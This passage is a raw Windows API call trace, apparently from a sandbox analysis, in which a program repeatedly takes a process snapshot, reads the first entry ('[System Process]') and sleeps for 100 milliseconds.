CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1638 [0124.350] Process32First (in: hSnapshot=0x1638, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.425] Sleep (dwMilliseconds=0x64) [0124.542] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1638 [0124.562] Process32First (in: hSnapshot=0x1638, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.649] Sleep (dwMilliseconds=0x64) [0124.760] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1638 [0124.772] Process32First (in: hSnapshot=0x1638, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.856] Sleep (dwMilliseconds=0x64) [0124.962] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1638 [0124.973] Process32First (in: hSnapshot=0x1638, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.064] Sleep (dwMilliseconds=0x64) [0125.165] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1638 [0125.176] Process32First (in: hSnapshot=0x1638, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.252] Sleep (dwMilliseconds=0x64) [0125.371] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1638 [0125.384] Process32First (in: hSnapshot=0x1638, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.468] Sleep (dwMilliseconds=0x64) [0125.577] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1638 [0125.586] Process32First (in: hSnapshot=0x1638, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.672] Sleep (dwMilliseconds=0x64) [0125.780] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1638 [0125.791] Process32First (in: hSnapshot=0x1638, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.940] Sleep (dwMilliseconds=0x64) [0126.047] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1638 [0126.057] Process32First (in: hSnapshot=0x1638, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.156] Sleep (dwMilliseconds=0x64) [0126.263] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1638 [0126.275] Process32First (in: hSnapshot=0x1638, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.353] Sleep (dwMilliseconds=0x64) [0126.467] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1638 [0126.479] Process32First (in: hSnapshot=0x1638, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.570] Sleep (dwMilliseconds=0x64) [0126.686] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1638 [0126.708] Process32First (in: hSnapshot=0x1638, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.772] Sleep (dwMilliseconds=0x64) [0126.890] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1638 [0126.900] Process32First (in: hSnapshot=0x1638, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.982] Sleep (dwMilliseconds=0x64) [0127.090] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1638 [0127.104] Process32First (in: hSnapshot=0x1638, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.222] Sleep (dwMilliseconds=0x64) [0127.324] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1638 [0127.334] Process32First (in: hSnapshot=0x1638, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.414] Sleep (dwMilliseconds=0x64) [0127.529] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1638 [0127.542] Process32First (in: hSnapshot=0x1638, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.650] Sleep (dwMilliseconds=0x64) [0127.770] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1638 [0127.783] Process32First (in: hSnapshot=0x1638, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.855] Sleep (dwMilliseconds=0x64) [0127.965] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1638 [0127.974] Process32First (in: hSnapshot=0x1638, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.130] Sleep (dwMilliseconds=0x64) [0128.743] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2174 [0128.756] Process32First (in: hSnapshot=0x2174, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.911] Sleep (dwMilliseconds=0x64) [0129.015] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0129.026] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.105] Sleep (dwMilliseconds=0x64) [0129.289] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0129.308] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.386] Sleep (dwMilliseconds=0x64) [0129.505] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0129.519] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.600] Sleep (dwMilliseconds=0x64) [0129.716] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0129.727] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.839] Sleep (dwMilliseconds=0x64) [0129.950] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0129.964] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.048] Sleep (dwMilliseconds=0x64) [0130.152] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0130.172] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.255] Sleep (dwMilliseconds=0x64) [0130.357] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0130.367] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.557] Sleep (dwMilliseconds=0x64) [0130.677] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0130.688] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.816] Sleep (dwMilliseconds=0x64) [0130.920] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0130.939] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.025] Sleep (dwMilliseconds=0x64) [0131.141] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0131.158] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.236] Sleep (dwMilliseconds=0x64) [0131.340] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0131.359] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.437] Sleep (dwMilliseconds=0x64) [0131.565] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0131.583] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.675] Sleep (dwMilliseconds=0x64) [0131.778] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0131.791] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.896] Sleep (dwMilliseconds=0x64) [0131.996] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0132.009] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.117] Sleep (dwMilliseconds=0x64) [0132.234] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0132.246] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.323] Sleep (dwMilliseconds=0x64) [0132.437] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0132.447] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.557] Sleep (dwMilliseconds=0x64) [0132.671] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0132.683] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.774] Sleep (dwMilliseconds=0x64) [0132.911] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0132.927] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.027] Sleep (dwMilliseconds=0x64) [0133.142] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0133.161] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.255] Sleep (dwMilliseconds=0x64) [0133.356] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0133.368] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.624] Sleep (dwMilliseconds=0x64) [0133.747] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0133.759] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.879] Sleep (dwMilliseconds=0x64) [0133.986] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0134.030] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.134] Sleep (dwMilliseconds=0x64) [0134.247] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0134.265] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.360] Sleep (dwMilliseconds=0x64) [0134.465] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0134.481] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.618] Sleep (dwMilliseconds=0x64) [0134.747] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1820 [0134.758] Process32First (in: hSnapshot=0x1820, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.897] Sleep (dwMilliseconds=0x64) [0135.672] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20cc [0135.689] Process32First (in: hSnapshot=0x20cc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.894] Sleep (dwMilliseconds=0x64) [0136.271] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3a8 [0136.304] Process32First (in: hSnapshot=0x3a8, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0136.402] Sleep (dwMilliseconds=0x64) [0137.420] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2130 [0137.452] Process32First (in: hSnapshot=0x2130, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.754] Sleep (dwMilliseconds=0x64) [0137.982] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x210c [0138.000] Process32First (in: hSnapshot=0x210c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0138.245] Sleep (dwMilliseconds=0x64) [0138.366] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20c8 [0138.381] Process32First (in: hSnapshot=0x20c8, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0138.775] Sleep (dwMilliseconds=0x64) [0138.907] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20e4 [0138.921] Process32First (in: hSnapshot=0x20e4, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.177] Sleep (dwMilliseconds=0x64) [0139.295] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20c0 [0139.316] Process32First (in: hSnapshot=0x20c0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.460] Sleep (dwMilliseconds=0x64) [0139.594] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x215c [0139.619] Process32First (in: hSnapshot=0x215c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.712] Sleep (dwMilliseconds=0x64) [0139.829] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x215c [0139.848] Process32First (in: hSnapshot=0x215c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.946] Sleep (dwMilliseconds=0x64) [0140.062] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x215c [0140.091] Process32First (in: hSnapshot=0x215c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0140.205] Sleep (dwMilliseconds=0x64) [0140.311] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x215c [0140.330] Process32First (in: hSnapshot=0x215c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0140.460] Sleep (dwMilliseconds=0x64) [0140.575] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x215c [0140.588] Process32First (in: hSnapshot=0x215c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0140.665] Sleep (dwMilliseconds=0x64) [0140.779] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x215c [0140.792] Process32First (in: hSnapshot=0x215c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0140.876] Sleep (dwMilliseconds=0x64) [0140.981] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x215c [0140.990] Process32First (in: hSnapshot=0x215c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0141.064] Sleep (dwMilliseconds=0x64) [0141.168] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x215c [0141.182] Process32First (in: hSnapshot=0x215c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0141.278] Sleep (dwMilliseconds=0x64) [0141.409] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x215c [0141.424] Process32First (in: hSnapshot=0x215c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0141.499] Sleep (dwMilliseconds=0x64) [0141.606] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x215c [0141.618] Process32First (in: 